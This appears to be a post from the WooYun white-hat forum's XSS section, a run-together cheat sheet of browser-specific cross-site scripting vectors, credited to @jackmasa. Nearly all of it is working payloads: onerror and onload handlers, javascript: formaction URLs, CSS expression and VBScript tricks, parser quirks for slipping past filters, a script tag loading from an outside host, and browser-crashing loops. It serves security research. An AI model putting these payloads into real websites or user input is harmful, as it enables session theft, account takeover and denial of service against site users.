当前位置:WooYun(白帽子技术社区) >> xss >> 整理了下推
| <!-- " --!><input value="><img src=xx:x onerror=alert(1)//"><script/onload=alert(1)></script> IE9<style/onload=alert(1)>alert([0x0D]-->[0x0D]1<!--[0x0D])1<!--idocument.write('<img src="<iframe/onload=alert(1)>\0">'); IE8JSON.parse('{"__proto__":["a",1]}')location++IE valid syntax: 我,啊=1,b=[我,啊],alert(我,啊)alert('aaa\0bbb') IE only show aaa http://jsbin.com/emekog<svg><animation xLI:href="javascript:alert(1)"> based on H5SC#88 #OperaFunction('alert(arguments.callee.caller)')()firefox dos? while(1)find();<div/style=x:expression(alert(URL=1))>Inject <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> enabled css expression,breaking standard mode!<applet code=javascript:alert('sgl')> and <embed src=javascript:alert('sgl')> umm...cute FF!<math><script>sgl='<img/src=xx:x onerror=alert(1)>'</script> chrome firefox opera vector<svg><oooooo/oooooooooo/onload=alert(1) > works on webkit~<body/onload=\\\vbs\\\::::::::alert+'x'+[000000]+'o'+'x'+[000000]::::::::>vbs:alert+-[]<body/onload=vbs::::::::alert----+--+----1:::::::::>Firefox vector <math><a xlink:href="//mmme.me">click<svg><script>a='<svg/onload=alert(1)></svg>';alert(2)</script>Inj>> <script/src=//0.gg/xxxxx> << <script>...</script> less xss
[code]Webkit X-XSS-Protection header is enabled just now :P<svg/onload=domain=id> 22 letters e.g http://fiddle.jshell.net./KG7fR/5/show/<?xml encoding="><svg/onload=alert(1)// >"><a "<img/src=xxx:x onerror=alert(1) >x</a> Distinctive IEAlso <a `="<img/onerror=alert(1) src=xx:xx>'></h1>">x</a><h1 "='<img/onerror=alert(1) src=xx:xx>'></h1> IE only<1h name="<svg/onload=alert(1)>"></1h><img ="1 src=xxx:x onerror=alert(1)//" > works in not-IEjavascript=1;for(javascript in RuntimeObject());javascript=='javascript'<body/onerror=alert(event)><img/src=javascript:throw[Object.getOwnPropertyNames(this)]> Firefox Sanbox object<img src='javascript:while([{}]);'> works in firefoxfor(x in document.open); Crash your IE 6:>localStorage.setItem('setItem',1)Only to find 'ſt'.toUpperCase()==='st'.toUpperCase()J̌ H̱ T̈ W̊ Y̊ i̇ length==2'ı'.toUpperCase()=='I'Also 'ß'.toUpperCase()=='SS''ff.toUpperCase() =='FF'// alike: fi FI fl FL ffi FFI ffl FFL ſt ST st ST#Opera data:text/html;base64,<<<<<<<<PH Nj cmlwdD5hb我-勒-个-去GVyd CgxKTwvc 2NyaXB0Pg=>>>>>>>>>>Firefox always the most cute data:_,<script>alert(1)</script><a href="ftp:/baidu.com">xx</a>http://ⓖⓄⓞⒼⓁⓔ︒ⒸⓄⓂ works in FirefoxRegExp.prototype.valueOf=alert,/-/-/-/;//IE,is there anything else?location='javascript:alert(1)'for({} in {});興味深い http://jsbin.com/inekab for Opera only<a href=https:http://www.google.com>x</a> That's a relative path?document.frames==window.frames<a href="jar:xxx" id=x></a> x.protocol=='http:' on #firefox(0).constructor.constructor=function(){alert(eval(arguments[0].substr(6)))} Easy to decode jjencode and aaencode :D127.0x000000001==127.0.0.1<input value="sefewfewf"/> Chrome input value block<svg><xmp><img/onerror=alert(1) src=xxx:x /><img src/="><img src=xxx:x onerror=alert(1)//">有趣的isindex <isindex formaction=javascript:alert(1) type=submit >chrome:xx - >chrome://crash/ crash?<form action=javascript:alert(1) /><input> Chrome input enter fucked!<form/><button/><keygen/> chrome send empty key,is funny~_~<form/><input/formaction=javascript:alert(1)> Because <form> not a void element.[/code
[code]<form><input/name="isindex"> when name are isindex does not send key.<form id=x ></form><button form=x formaction="javascript:alert(1)">X It like http://html5sec.org/#1 but only chrome support .<script language="php">echo 1 ?> Fascinating.fvck:for(_
in
this)_['match'](/.Element$/)&&console.log(_)location.reload('javascript:alert(1)') //ie only,lol~{}alert(1)
Twitter @jackmasa =P
(">_< ' / & \ 看啥,没见过跨站字符么) 
